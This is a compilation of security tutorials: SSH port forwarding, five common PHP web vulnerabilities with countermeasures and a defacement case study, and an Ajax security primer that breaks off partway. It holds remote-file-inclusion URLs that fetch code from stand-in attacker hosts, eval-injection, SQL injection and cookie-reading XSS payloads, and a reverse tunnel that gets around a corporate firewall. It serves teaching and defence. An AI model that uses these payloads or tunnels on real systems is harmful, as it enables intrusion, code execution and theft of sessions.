Monday, November 23, 2009

SSH Port Forwarding

Introduction
SSH is typically used for logging into remote servers so you have shell access to do maintenance, read your email, restart services, or whatever administration you require. SSH also offers some other native services, such as file copy (using scp and sftp) and remote command execution (using ssh with a command on the command line after the hostname).

Whenever we SSH from one machine to another, we establish a secure encrypted session. The first article in this SSH series[1] looked at properly verifying a server's host key, so that we can be sure no attacker is able to perform a man-in-the-middle attack and read or manipulate what we do in that session. Other articles in this series looked at removing the need for static passwords using SSH user identities[2], and then using ssh-agent[3] to automate the task of typing passphrases.

SSH also has a wonderful feature called SSH Port Forwarding, sometimes called SSH Tunneling, which allows you to establish a secure SSH session and then tunnel arbitrary TCP connections through it. Tunnels can be created at any time, with almost no effort and no programming, which makes them very appealing. In this article we look at SSH Port Forwarding in detail, as it is a very useful but often misunderstood technology. SSH Port Forwarding can be used for secure communications in a myriad of different ways. Let's start with an example.

LocalForward Example
Say you have a mail client on your desktop, and currently use it to get your email from your mail server via POP, the Post Office Protocol, on port 110.[4] You may want to protect your POP connection for several reasons, such as keeping your password from going across the line in the clear[5], or just to make sure no one's sniffing the email you're downloading.

Normally, your mail client will establish a TCP connection to the mail server on port 110, supply your username and password, and download your email. You can try this yourself using telnet or nc on the command line:

xahria@desktop$ nc mailserver 110
+OK SuperDuper POP3 mail server (mailserver.my_isp.net) ready.
USER xahria
+OK
PASS twinnies
+OK User successfully logged on.
LIST
+OK 48 1420253
1 1689
2 1359
3 59905
...
47 3476
48 3925
.
QUIT
+OK SuperDuper POP3 mail server signing off.

xahria@desktop$

We can wrap this TCP connection inside an SSH session using SSH Port Forwarding. If you have SSH access to the machine that offers your service (POP, port 110 in this case) then SSH to it. If you don't, you can SSH to a server on the same network if the network is trusted. (See the security implications of port forwarding later in this article.)

In this case, let's assume we don't have SSH access to the mail server, but we can log into a shell server on the same network, and create a tunnel for our cleartext POP connection:

# first, show that nothing's listening on our local machine on port 9999:
xahria@desktop$ nc localhost 9999
Connection refused.

xahria@desktop$ ssh -L 9999:mailserver:110 shellserver
xahria@shellserver's password: ********

xahria@shellserver$ hostname
shellserver

From a different window on your desktop machine, connect to your local machine (localhost) on port 9999:

xahria@desktop$ nc localhost 9999
+OK SuperDuper POP3 mail server (mailserver.my_isp.net) ready.
USER xahria
+OK
PASS twinnies
...

Before we connected to the shellserver with SSH, nothing was listening on port 9999 on our desktop - once we'd logged in to the shell server with our tunnel in place, this port was bound by our SSH process, and any TCP connection to local port 9999 was magically tunneled through SSH to the other side.

Let's describe how this works in detail, using the example above.

* You launch the /usr/bin/ssh SSH client on the command line.
* The SSH client logs into the remote machine using whatever authentication method (password, public key, etc.) is available.
* The SSH client binds the local port you specified, port 9999, on the loopback interface, 127.0.0.1.
* You can do anything in your remote machine that you want -- tar up some files, write to some users, delete /etc/shadow... This interactive login is completely usable, or you can just let it hang around doing nothing.
* When a process connects to 127.0.0.1 on port 9999 on the client machine, the /usr/bin/ssh client program accepts the connection.
* The SSH client informs the server, over the encrypted channel, to create a connection to the destination, in this case mailserver port 110.
* The client takes any bits sent to this port (9999), sends them to the server inside the encrypted SSH session, who decrypts them and then sends them in the clear to the destination, port 110 of the mailserver.
* The server takes any bits received from the destination, mailserver's port 110, and sends them inside the SSH session back to the client, who decrypts and sends them in the clear to the process that connected to the client's bound port, port 9999.
* When the connection is closed by either endpoint, it is torn down inside the SSH session as well.

SSH Port Forward Debugging
Let's see it in action by using the verbose option to ssh:

xahria@desktop$ ssh -v -L 9999:mailserver:110 shellserver
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: Connecting to shellserver [296.62.257.251] port 22.
debug1: Connection established.
debug1: identity file /home/bri/.ssh/identity type 0
debug1: identity file /home/bri/.ssh/id_rsa type 1
debug1: identity file /home/bri/.ssh/id_dsa type 2
...
debug1: Next authentication method: password
xahria@shellserver's password: ********
debug1: Authentication succeeded (password).
debug1: Connections to local port 9999 forwarded to remote address mailserver:110
debug1: Local forwarding listening on 127.0.0.1 port 9999.
debug1: channel 0: new [client-session]
debug1: Entering interactive session.
debug1: channel 0: request pty-req
debug1: channel 0: request shell
xahria@shellserver$

As you can see, there's a brief mention of port 9999 being bound and available for tunneling. We haven't made a connection to this port yet, so no tunnel is active yet. You can use the ~# escape sequence to see the connections in use. This sequence only works after a carriage return, so hit enter a few times before trying it:

xahria@shellserver$ (enter)
xahria@shellserver$ (enter)
xahria@shellserver$ (enter)
xahria@shellserver$ ~#
The following connections are open:
#1 client-session (t4 r0 i0/0 o0/0 fd 5/6)
xahria@shellserver$

You can see that there's only one connection, our actual SSH session from which we're typing those unix commands.

Now, in a different window if we do a telnet localhost 9999, we'll open up a new connection through the tunnel, and we can see it from our SSH session using ~#

xahria@shellserver$ (enter)
xahria@shellserver$ ~#
The following connections are open:
#1 client-session (t4 r0 i0/0 o0/0 fd 5/6)
#2 direct-tcpip: listening port 9999 for mailserver port 110, connect from 127.0.0.1 port 42789 (t4 r1 i0/0 o0/0 fd 8/8)

You can see that now we have both the SSH session we're using, plus a tunnel, the second entry. It tells you all you need to know about the connection -- it came from our local machine (127.0.0.1) source port 42789, which we could look up with netstat or lsof output if we were curious about it.

RemoteForward Example
SSH Forwards actually come in two flavours. The one I've shown above is a Local Forward, where the SSH client machine listens for new connections to be tunneled. A Remote Forward is just the opposite: the SSH server machine listens for new connections, which are tunneled back through the client machine.

The classic example of using a Remote Forward goes something like this. You're at work, and VPN access is going to be down for maintenance over the weekend. You have some important work to do, but you'd rather do it from the comfort of your desk at home than be stuck at the office all weekend. There's no way to SSH to your work desktop from outside because it's behind the firewall.

Before you leave for the evening, you SSH from your work desktop back to your home network. Your ~/.ssh/config file has the following snippet:

lainee@work$ tail ~/.ssh/config
Host home-with-tunnel
Hostname 204.225.288.29
RemoteForward 2222:localhost:22
User laineeboo



lainee@work$ ssh home-with-tunnel
laineeboo@204.225.288.29's password: ********

laineeboo@home$ ping -i 5 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=255 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=255 time=0.2 ms
...

We've set up a tunnel using the RemoteForward option in the SSH configuration file. (We could have set it up on the command line using the -R option if we'd preferred.) Just to make sure our firewall doesn't kill the connection for inactivity, we run a ping for grins. Then we head on home.
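If you prefer the command line, the equivalent of that RemoteForward entry would look something like the following (using the same example address and ports):

lainee@work$ ssh -R 2222:localhost:22 laineeboo@204.225.288.29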

Later that evening, we can sit down on our home machine and see that we're logged in:

laineeboo@home$ last -1
laineeboo pts/18 firewall.my_work.com Tue Nov 23 22:28 still logged in

laineeboo@home$ ps -t pts/18
PID TTY TIME CMD
3794 pts/18 00:00:00 ksh
4027 pts/18 00:00:00 ping -i 5 127.0.0.1

Now comes the payoff - our tunnel is listening on our home machine on port 2222, and will be tunneled back through the corporate firewall to our work machine's port 22. So to SSH to work from home, since we have our tunnel ready, we simply point /usr/bin/ssh to port 2222:

laineeboo@home$ ssh -p 2222 lainee@localhost
lainee@localhost's password: ********

lainee@work$

Success!
Port Forwarding Cheat Sheet
Remembering how to specify the kind of SSH Forward you want is sometimes tricky. Hopefully, the following table will make it a bit easier.

LocalForwards
  Command line option:       -L local_listen_port:destination_host:destination_port
  Configuration file entry:  LocalForward local_listen_port:destination_host:destination_port
  local_listen_port is bound on the SSH client's loopback interface
  destination_host is contacted from the SSH server host

RemoteForwards
  Command line option:       -R remote_listen_port:destination_host:destination_port
  Configuration file entry:  RemoteForward remote_listen_port:destination_host:destination_port
  remote_listen_port is bound on the SSH server's loopback interface
  destination_host is contacted from the SSH client host

Forwards can be confusing - we typically think of connections as being made up of four things: the local IP and port, and the remote IP and port. In the forward definition you create, you only specify three things, because the listening address is always the SSH client machine (Local Forward) or the SSH server machine (Remote Forward), and thus isn't spelled out.

Port Forward Security
Port forwards bind a port on either the ssh client (Local Forwards) or ssh server (Remote Forwards). With a default installation, the port will only be bound on the localhost interface, 127.0.0.1. This means that the tunnel is only available to someone on the machine where that port is listening.

In general, you don't want to allow other machines to contact your SSH tunnel so this is the correct setting. If you want to allow these ports to be available to any machine, then use one of the following:

                  Command line option    Configuration file option
  LocalForwards   -g                     GatewayPorts yes (in ~/.ssh/config or /etc/ssh/ssh_config)
  RemoteForwards  (none available)       GatewayPorts yes (in /etc/sshd_config)
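For example, to make the earlier POP tunnel reachable from other machines on your network (think hard about whether you really want this), you could add -g to the local forward:

xahria@desktop$ ssh -g -L 9999:mailserver:110 shellserver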

The other important thing you must remember is that the data connection is only encrypted inside the SSH connection. If the destination_host you specify is not localhost[6], then the portion of the connection that extends out of the tunnel is not encrypted. For example, if you used the following:

desktop$ ssh -L 8080:www.example.com:80 somemachine

then any connection to localhost:8080 will be encrypted from your desktop through to somemachine, but it will be in cleartext from somemachine to www.example.com. If that fits your security model, no problem. But keep it in mind.
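If you do have SSH access to the destination host itself, you can keep the entire path encrypted by making the SSH server and the destination the same machine. For instance, a tunnel along these lines (assuming you have a shell account on www.example.com) never puts cleartext on the wire, because the destination_host localhost is resolved on the SSH server itself:

desktop$ ssh -L 8080:localhost:80 www.example.com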

We'll see how you can put further limits on port forwards in a future article, such as rejecting or limiting them based on the SSH Pubkeys/Identity that is used for authentication.

NOTES:

[1] SSH Host Key Protection: http://www.securityfocus.com/infocus/1806

[2] SSH User Identities: http://www.securityfocus.com/infocus/1810

[3] SSH and ssh-agent: http://www.securityfocus.com/infocus/1812

[4] Some POP server software offers SSL-encrypted POP, by negotiating SSL using STARTTLS on port 110, or wrapped entirely in SSL on port 995. For this example, however, let's assume you have a non-SSL aware POP server.

[5] Some POP servers support alternate authentication methods, such as S/Key or challenge response, which can keep your password from going across the network.

[6] Unsniffable options would be localhost, 127.0.0.1 (or any 127/8 address on most unix-like systems) or any local IP address - these should all go through the local machine's TCP/IP stack without hitting the network card at all, and thus would be as secure as the network stack itself.

View more articles by Brian Hatch on SecurityFocus.




Five common Web application vulnerabilities

1. Introduction

"No language can prevent insecure code, although there are language features which could aid or hinder a security-conscious developer."
-Chris Shiflett

This article looks at five common Web application attacks, primarily for PHP applications, and then presents a case study of a vulnerable Website that was found through Google and easily exploited. Each of the attacks we'll cover is part of a wide field of study, and readers are advised to follow the references listed in each section for further reading. It is important for Web developers and administrators to have a thorough knowledge of these attacks. It should also be noted that Web applications can be subjected to many more attacks than just those listed here.

While most of the illustrated examples in this article will discuss PHP coding due to its overwhelming popularity on the Web, the concepts also apply to any programming language. The attacks explained in this article are:

1. Remote code execution
2. SQL injection
3. Format string vulnerabilities
4. Cross Site Scripting (XSS)
5. Username enumeration

Considering the somewhat poor programming practices that lead to these attacks, the article provides some real examples of popular products that have had these same vulnerabilities in the past. Some countermeasures are offered with each example to help prevent future vulnerabilities and subsequent attacks.

This article integrates some of the critical points found in a number of whitepapers and articles on common Web application vulnerabilities. The goal is to provide an overview of these problems within one short article.
2. Vulnerabilities
2.1 Remote code execution
As the name suggests, this vulnerability allows an attacker to run arbitrary, system level code on the vulnerable server and retrieve any desired information contained therein. Improper coding leads to this vulnerability.

At times, it is difficult to discover this vulnerability during penetration testing assignments, but such problems are often revealed while doing a source code review. However, when testing Web applications it is important to remember that exploitation of this vulnerability can lead to total system compromise with the same rights as the Web server itself.

Rating: Highly Critical

Previously vulnerable products:
phpBB, Invision Board, cPanel, PayPal cart, Drupal, and many others

Here we will look at two such types of critical vulnerabilities:

1. Exploiting register_globals in PHP: register_globals is a PHP setting that controls whether request data (such as values posted from a user's form, URL parameters, or cookies) is automatically registered as global variables in a PHP script. In earlier releases of PHP, register_globals was set to "on" by default, which made a developer's life easier - but it also led to less secure coding and was widely exploited. When register_globals is set to "on" in php.ini, a remote user can initialize variables that the script never initialized itself. Many times an uninitialized parameter is used to build the path of an include file, and this can lead to the execution of arbitrary files from local or remote locations. For example:

require ($page . ".php");

Here, if the $page parameter is not initialized by the script and register_globals is set to "on," the server is vulnerable to remote code execution: an attacker can supply an arbitrary file in the $page parameter. Now let's look at the exploit code:

http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt

In this way, the file "http://www.attacker.com/attack.txt" will be included and executed on the server. It is a very simple but effective attack.
2. XML-RPC for PHP vulnerabilities: Another common vulnerability in this category involves XML-RPC implementations in PHP.

XML-RPC is a specification and a set of implementations that allow software running on disparate operating systems and in different environments to make procedure calls over the Internet. It is commonly used in large enterprises and Web environments. XML-RPC uses HTTP for its transport protocol and XML for data encoding. Several independent implementations of XML-RPC exist for PHP applications.

A common flaw is in the way that several XML-RPC PHP implementations pass unsanitized user input to the eval() function within the XML-RPC server. It results in a vulnerability that could allow a remote attacker to execute code on a vulnerable system. An attacker with the ability to upload a crafted XML file could insert PHP code that would then be executed by the Web application that is using the vulnerable XML-RPC code.

Here is a sample malicious XML file:

<?xml version="1.0"?>
<methodCall>
  <methodName>test.method</methodName>
  <params>
    <param>
      <value><name>','')); phpinfo(); exit;/*</name></value>
    </param>
  </params>
</methodCall>
The above XML file, when posted to the vulnerable server, will cause the phpinfo() function call to be executed on the vulnerable server, in this case a simple example that reveals various details about the PHP installation.
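To see why this class of bug is so dangerous, here is a deliberately simplified sketch - not the actual XML-RPC library code - of what happens when a value parsed out of the request ends up inside a string handed to eval():

<?php
// Deliberately simplified sketch - not the real XML-RPC library code.
// $value stands in for data parsed out of the posted XML document.
$value = "1); phpinfo(); exit; //";

// The library intended to build something like: $params = array(1);
// but the attacker-controlled value closes the call and appends code.
eval('$params = array(' . $value . ');');
?>

The injected phpinfo() and exit calls run with the privileges of the Web server, just as in the XML example above.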

Here is a list of software which have previously possessed this style of bug:
Drupal, Wordpress, Xoops, PostNuke, phpMyFaq, and many others

Countermeasures:

1. More recent PHP versions have register_globals set to "off" by default; however, some users will change the default setting for applications that require it. The directive can be set to "on" or "off" either in the php.ini file or in a .htaccess file. If it is set to "on," every variable should be properly initialized before use. Administrators who are unsure should question application developers who insist on using register_globals.
2. It is an absolute must to sanitize all user input before processing it. As far as possible, avoid using shell commands. However, if they are required, ensure that only filtered data is used to construct the string to be executed and make sure to escape the output.
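As a concrete illustration of these points, a minimal sketch (assuming the page names map to local .php files, as in the earlier require() example) might whitelist the allowed values instead of trusting the request:

<?php
// Minimal sketch: whitelist the pages that may be included,
// rather than trusting a $page value taken from the request.
$allowed = array('home', 'news', 'contact');
$page = isset($_GET['page']) ? $_GET['page'] : 'home';

if (in_array($page, $allowed, true)) {
    require $page . '.php';
} else {
    require 'home.php';   // fall back to a known-safe page
}
?>

Because only values from the fixed list are ever passed to require(), a URL such as the attack.txt example above simply falls back to the default page.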

References:

1. Using register_globals on php.net
2. Changes to register_globals in prior versions of PHP
3. Another PHP XMLRPC remote code execution example
4. CERT advisory on PHP XML-RPC vulnerabilities
5. File inclusion vulnerability in PayPal Store Front
6. Essential PHP Security, published by O'Reilly

2.2 SQL Injection
SQL injection is a very old approach but it's still popular among attackers. This technique allows an attacker to retrieve crucial information from a Web server's database. Depending on the application's security measures, the impact of this attack can vary from basic information disclosure to remote code execution and total system compromise.

Rating: Moderate to Highly Critical

Previously vulnerable products:
PHPNuke, MyBB, Mambo CMS, ZenCart, osCommerce

Covering SQL injection attacks in exhaustive detail is beyond the scope of this article, but the references section below lists a few good links that will help you better understand this technique. This attack applies to any database, but from an attacker's perspective there are a few "favorites."

MS SQL offers extended stored procedure calls, which allow system-level commands to be executed via the MS SQL server - such as adding a user. Also, the error messages displayed by the MS SQL server reveal more information than a comparable MySQL server. While the MS SQL server itself is not especially prone to SQL injection attacks, there are security measures that should be implemented to secure it and keep the SQL server from giving out critical system information.

Here is an example of vulnerable code in which the user-supplied input is directly used in a SQL query:

<form method="POST">
Name: <input type="text" name="username">
<input type="submit">
</form>

<?php
$query = "SELECT * FROM users WHERE username = '{$_POST['username']}'";
$result = mysql_query($query);
?>

The script will work normally when the username doesn't contain any malicious characters. In other words, when submitting a non-malicious username (steve) the query becomes:

$query = "SELECT * FROM users WHERE username = 'steve'";

However, a malicious SQL injection query will result in the following attempt:

$query = "SELECT * FROM users WHERE username = '' or '1=1'";

As the "or" condition is always true, the mysql_query function returns records from the database. A similar example, using AND and a SQL command to generate a specific error message, is shown in the URL below in Figure 1.

Figure 1. Error message displaying the MS SQL server version.

It is obvious that these error messages help an attacker get hold of the information they are looking for (such as the database name, table names, usernames, password hashes, and so on). Displaying customized error messages is therefore a good workaround for this problem. However, there is another attack technique, known as Blind SQL Injection, in which the attacker can still perform SQL injection even when the application does not reveal any database error message containing useful information.

Countermeasures:

1. Avoid connecting to the database as a superuser or as the database owner. Always use customized database users with the bare minimum privileges required to perform the assigned task.
2. If the PHP magic_quotes_gpc directive is on, then all POST, GET and COOKIE data is escaped automatically.
3. PHP has two functions for MySQL that sanitize user input: addslashes (an older approach) and mysql_real_escape_string (the recommended method). The latter is available from PHP 4.3.0 onwards, so check first that the function exists and that you're running a recent version of PHP 4 or 5. mysql_real_escape_string prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.
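As a minimal sketch of the third countermeasure, the earlier username query could be built like this (the connection details are placeholders, and the same mysql_* functions as the vulnerable example are assumed):

<?php
// Placeholder connection details for the sketch.
$link = mysql_connect('localhost', 'app_user', 'secret');
mysql_select_db('app_db', $link);

// Escape the user-supplied value before placing it inside the query.
$username = mysql_real_escape_string($_POST['username'], $link);
$query    = "SELECT * FROM users WHERE username = '{$username}'";
$result   = mysql_query($query, $link);
?>

With the value escaped, the quote in a payload such as ' or '1=1 no longer terminates the string, so the injected condition is treated as literal data.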

References for standard SQL Injection:

1. Steve's SQL Injection attack examples
2. SQL Injection Whitepaper (PDF)
3. Advanced SQL Injection paper

Blind SQL Injection:

1. SPI Dynamics blind SQL Injection paper (PDF)
2. iMperva blind SQL Injection article

2.3 Format String Vulnerabilities
This vulnerability results from the use of unfiltered user input as the format string parameter in certain Perl or C functions that perform formatting, such as C's printf().

A malicious user may use the %s and %x format tokens, among others, to print data from the stack or possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the %n format token, which commands printf() and similar functions to write back the number of characters written so far. This assumes that the corresponding argument exists and is of type int *.

Format string vulnerability attacks fall into three general categories: denial of service, reading and writing.

Rating: Moderate to Highly Critical

Previously vulnerable products:
McAfee AV, Usermin, Webmin, various Apache modules, WinRAR, ettercap, and others.

* Denial-of-service attacks that use format string vulnerabilities are characterized by utilizing multiple instances of the %s format specifier, used to read data off of the stack until the program attempts to read data from an illegal address, which will cause the program to crash.
* Reading attacks use the %x format specifier to print sections of memory that the user does not normally have access to.
* Writing attacks use the %n format specifier (usually combined with width specifiers such as %d, %u or %x to control the value written) to overwrite the instruction pointer and force execution of attacker-supplied shell code.

Here is the piece of code in miniserv.pl which was the cause of a vulnerability in Webmin:

if ($use_syslog && !$validated) {
    syslog("crit",
           ($nonexist ? "Non-existent" :
            $expired ? "Expired" : "Invalid") .
           " login as $authuser from $acpthost");
}

In this example, the user supplied data is within the format specification of the syslog call.

The vectors for a simple DoS (denial of service) of the Web server are to use %n and %0(large number)d inside the username parameter. The former causes a write-protection fault within Perl, leading to script abortion, while the latter causes a large amount of memory to be allocated inside the perl process.

A detailed Webmin advisory that was used for this example is available and provides more information.

Countermeasure:

Edit the source code so that the input is properly verified.

References:

1. tiny FAQ
2. Wiki definition

2.4 Cross Site Scripting
The success of this attack requires the victim to follow a malicious URL, which may be crafted in such a manner that it appears legitimate at first look. When the victim visits such a crafted URL, the attacker can effectively execute something malicious in the victim's browser. Some malicious JavaScript, for example, will be run in the context of the web site which possesses the XSS bug.

Rating: Less to Moderately Critical

Previously vulnerable products:
Microsoft IIS web server, Yahoo Mail, Squirrel Mail, Google search.

Cross Site Scripting is generally possible wherever user input is echoed back in the page. The following are popular targets:

1. On a search engine that returns 'n' matches found for your '$_search' keyword.
2. Within discussion forums that allow script tags, which can lead to a permanent XSS bug.
3. On login pages that return an error message for an incorrect login along with the login entered.

Additionally, the ability to execute arbitrary JavaScript in the victim's browser can allow an attacker to steal the victim's cookie and then hijack their session.



Here is a sample piece of code which is vulnerable to an XSS attack:

<html>
<body>
Welcome!!
<form method="GET" action="clean.php">
Enter your name: <input type="text" name="name_1">
<input type="submit">
</form>

<?php
echo "<br>Your Name<br>";
echo ($_GET['name_1']);
?>
</body>
</html>

In this example, the value passed to the variable 'name_1' is not sanitized before echoing it back to the user. This can be exploited to execute any arbitrary script.

Here is some example exploit code:

http://victim_site/clean.php?name_1=<script>alert('XSS')</script>
or
http://victim_site/clean.php?name_1=<script>alert(document.cookie)</script>

Countermeasures

The above code can be edited in the following manner to avoid XSS attacks:

<?php
$html = htmlentities($_GET['name_1'], ENT_QUOTES, 'UTF-8');
echo "<br>Your Name<br>";
echo ($html);
?>

References:

1. htmlentities on php.net
2. SPI Dynamics XSS article
3. Essential PHP Security published by O'Reilly

2.5 Username enumeration
Username enumeration is a type of attack where the backend validation script tells the attacker whether the supplied username is correct or not. Exploiting this vulnerability lets the attacker experiment with different usernames and determine valid ones with the help of these differing error messages.

Rating: Less Critical

Previously vulnerable products:
Nortel Contivity VPN client, Juniper Netscreen VPN, Cisco IOS [telnet].

Figure 2 shows an example login screen:


Figure 2. Sample login screen.

Figure 3 shows the response given when a valid username is guessed correctly:


Figure 3. Valid username with incorrect password.

Username enumeration can help an attacker who attempts to use some trivial usernames with easily guessable passwords, such as test/test, admin/admin, guest/guest, and so on. These accounts are often created by developers for testing purposes, and many times the accounts are never disabled or the developer forgets to change the password.

During pen testing assignments, the authors of this article have found such accounts are not only common and have easily guessable passwords, but at times they also contain sensitive information like valid credit card numbers, passport numbers, and so on. Needless to say, these could be crucial details for social engineering attacks.

Countermeasures:

Display consistent error messages to prevent disclosure of valid usernames. If trivial accounts have been created for testing purposes, make sure their passwords are not trivial, or better yet, that these accounts are removed entirely once testing is over - and before the application is put online.
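A minimal sketch of the first countermeasure might look like the following; the hard-coded user table is purely illustrative and stands in for whatever user store a real application would query:

<?php
// Hypothetical user table for the sketch; a real application would
// query its own user store instead.
$users = array('steve' => md5('secret'));

$name = isset($_POST['username']) ? $_POST['username'] : '';
$pass = isset($_POST['password']) ? $_POST['password'] : '';

if (isset($users[$name]) && $users[$name] === md5($pass)) {
    echo 'Welcome, ' . htmlentities($name, ENT_QUOTES, 'UTF-8');
} else {
    // The same message covers both a bad username and a bad password,
    // so an attacker cannot tell which of the two was wrong.
    echo 'Invalid username or password.';
}
?>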
3. Case study: notice Google's power
Most incidents such as Web site defacement or other basic hacking activity are done by people (often referred to as 'script kiddies') to gain recognition among their peers - and not really to gain any valuable information like credit cards. In this part of the article, we will look at one real-life example the authors have faced in their role as penetration testers.

One day we received a call from software company XYZ in Asia-Pacific. Their Website had been defaced. The main Website displayed a message saying that the site had been hacked by somebody in Holland. But the questions buzzing in everyone's mind were:

1. Why would somebody in Holland be interested in this Website? What could the attacker gain by hacking into it? There was no critical information on the server which would benefit an attacker, certainly no credit card information. After a detailed analysis it was concluded the attack was probably done more for fun than for profit.
2. Most importantly, how did the hacker break in?

The site which was defaced had been running a vulnerable version of a popular e-commerce software package. The vulnerability in this software allowed an attacker to include a remote file, thereby allowing the execution of any arbitrary code within the context of the Web server's privileges. Here is the snippet of code which caused this vulnerability:

<?php
if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
}
?>

Exploiting this vulnerability is very trivial. All the attacker did to exploit this was to include, in the URL, a remote file having the malicious code which he wanted to execute:

http://vulnerable_server/includes/include_once.php?
include_file=https://attackersite.com/exploit.txt (note: all on one line)

The attacker could then run arbitrary code on the vulnerable server through this exploit.txt file - for example, something along these lines:

<?php
// print the source of application.php on the vulnerable server
show_source('application.php');
?>

The above code will print the source code of the application.php file.

The question which needs to be considered here is: how did the attacker first reach this site? And how did he know that the victim was using a vulnerable version of this software? Well, a Google search for "inurl:/includes/include_once.php" lists all the web sites using this vulnerable product, and it's a cakewalk from there. Once found, the attacker's job was simply to run the same exploit on any or all of the Websites that Google returned, and soon they would all be compromised.

Thus we see that an attacker can easily reach a Website that uses vulnerable software through "Google dorks." In most of these cases, exploit code is readily available to the public through mailing lists, vulnerability reporting websites, and elsewhere, so it becomes trivial for an attacker to exploit known vulnerabilities in any Web application. It is not only the vendor's responsibility to release a patch as soon as a vulnerability is discovered; Website operators deploying the software also need to keep themselves up to date on the security issues discovered in every package they have deployed. Even if the application is no longer in use, the server may still be vulnerable as long as the files exist on it.
4. Defense-in-depth
This article has rightly focused on the source of Web vulnerabilities – the applications themselves. The application code is always the first place to secure a Web application. But there are also additional, defense-in-depth methods that can add additional layers of protection.

Once the Web server is hardened and the application is quality tested to be secure, additional layers will still help improve one's security posture. One approach using open-source software would be to use the mod_security Apache module with a modified Snort ruleset on the Web server itself, run Apache in a chroot environment, provide file integrity monitoring of the Web server files using AIDE, and then add Snort as either a HIDS or a NIDS. With regularly updated rulesets and an administrator who actively reads the logs, this provides an effective additional layer of defense. Of course, commercial alternatives to each of these technologies are also available. However, step number one is still to make the Web application itself secure.
5. Conclusion
In this article we've demonstrated five common web application vulnerabilities, their countermeasures and their criticality. If there is a consistent message among these attacks, it is that the key to mitigating these vulnerabilities is to sanitize user input before processing it. Through the case study we tried to connect standard Google hacking with these vulnerabilities and show how attackers use the approaches together to reach sites running vulnerable products and then hack and deface them.
About the Authors
Sumit Siddharth, GCIA, and Pratiksha Doshi are both penetration testers at NII Consulting, which specializes in pen-tests, security audits, compliance and forensics.


Ajax Security Basics

Jaswinder S. Hayre, CISSP, and Jayasankar Kelath, CISSP 2006-06-19

Editor's note: Article first published 2006-06-19; updated 2006-06-22. Added several additional references that were mistakenly omitted by the authors, plus a new section on sources for further reading.
1. Introduction

Ajax technologies have been very visible on the web over the past year, due to their interactive nature. Google Suggest and Google Maps [ref 1] are some of the notable early adopters of Ajax. Companies are now thinking of how they too can leverage it, web developers are trying to learn it, security professionals are thinking of how to secure it, and penetration testers are thinking of how to hack it. Any technology that can improve the throughput of servers, produce more fluid page transitions, and make web applications even richer for the end user is bound to find a place in the industry.

Ajax is considered the next step in a progression towards the trumpeted "Web 2.0." The purpose of this article is to introduce some of the security implications of modern Ajax web technologies. Though Ajax applications can be more difficult to test, security professionals already have most of the relevant approaches and tools needed. The authors will discuss whether today's popular push to say goodbye to full webpage refreshes using Ajax also means we are saying hello to some new security holes. We will begin with a brief discussion of the technology behind Ajax, followed by a discussion of the security impact of applications using Ajax technology.
2. Ajax Primer

Regular web applications work on a synchronous model, where one web request is followed by a response that causes some action in the presentation layer. For example, clicking a link or the submit button makes a request to the web server with the relevant parameters. This traditional "click and wait" behavior limits the interactivity of the application. This problem has been mitigated by the use of Ajax (Asynchronous JavaScript and XML) technologies. For the purposes of this article, we will define Ajax as the method by which asynchronous calls are made to web servers without causing a full refresh of the webpage. This kind of interaction is made possible by three different components: a client-side scripting language, the XmlHttpRequest (XHR) object and XML.

Let's briefly discuss these components individually. A client-side scripting language is used to initiate calls to the server and then used to programmatically access and update the DOM within the client's browser, in response to the request. The most popular choice on the client is JavaScript because of its ubiquitous adoption by well-known browsers. The second component is the XHR object, which is really the heart of it all. Languages such as JavaScript use the XHR object to send requests to the web server behind the scenes, using HTTP as the transport medium. Then we have the third component, the use of which isn't necessarily set in stone: XML is the data format for messages being exchanged.

Many sites use JSON (JavaScript Object Notation) in place of XML because it's easier to parse and it has less overhead. When using JavaScript to parse JSON, it's as simple as passing it to the eval() function. On the other hand, one might use XPath to parse the returned XML. Also, there are many "Ajax sites" out there which don't use XML or JSON at all, and instead just send snippets of plain old HTML which are dynamically inserted into the page.

As it turns out, Ajax isn't a brand new technology but instead a combination of existing technologies used together to develop highly interactive web applications. In reality, all these components have been around for a number of years, marked by many with the release of Internet Explorer 5.0. Developers have found many uses for Ajax such as "suggestive" textboxes (such as Google Suggest) and auto-refreshing data lists. All XHR requests are still processed by typical server side frameworks, such as the standard options like J2EE, .NET and PHP. The asynchronous nature of Ajax applications is illustrated below in Figure 1.

Figure 1.
Figure 1. An Ajax sequence is asynchronous.
3. Security implications with Ajax

Now that we have reviewed the basics of Ajax, let's discuss its security implications. Ajax does not inherently introduce new security vulnerabilities in the realm of web applications. Instead, the applications face the same security issues as classic web applications. Unfortunately, common Ajax best practices have not been developed, which leaves plenty of room to get things wrong. This includes proper authentication, authorization, access control and input validation. [ref 2] Some potential areas of concern involving the use of Ajax include the following:

* Client-side security controls

Some might argue that the dependence on client side programming opens up the possibility of bringing some already well-known problems back into the forefront. [ref 2] One such possibility relates to developers improperly implementing security through client-side controls. As we discussed in the previous section, the use of Ajax requires quite a bit of client-side scripting code. Web developers are now writing both the server-side and client-side code, so this might attract developers towards implementing security controls on the client-side. This approach is horribly insecure because attackers can modify any code running on their client computer when testing the application for vulnerabilities. Security controls should either be completely implemented on the server or always re-enforced on the server.

* Increased attack surface

A second challenge relates to the difficulty involved in securing the increased attack surface. Ajax inevitably increases the overall complexity of the system. In the process of adopting Ajax, developers could code a great number of server-side pages, each page performing some tiny function (such as looking up a zip code for auto-completing a user's city and state fields) in the overall application. These small pages will each be an additional target for attackers, and thus an additional point which needs to be secured to ensure a new vulnerability has not been introduced. This is analogous to the well-known security concept of multiple points of entry: a house with one door is far easier to secure than one with ten doors.

* Bridging the gap between users and services

Ajax is a method by which developers bring end users closer to the interfaces exposed by Service Oriented Architectures. [ref 3] The push to create loosely coupled service-based architectures is a promising idea with many benefits in enterprise environments. As more of these service-based "endpoints" are developed, and as Ajax introduces the ability to push more sophisticated processing to the end user, the possibility of moving away from the standard three-tier model arises.

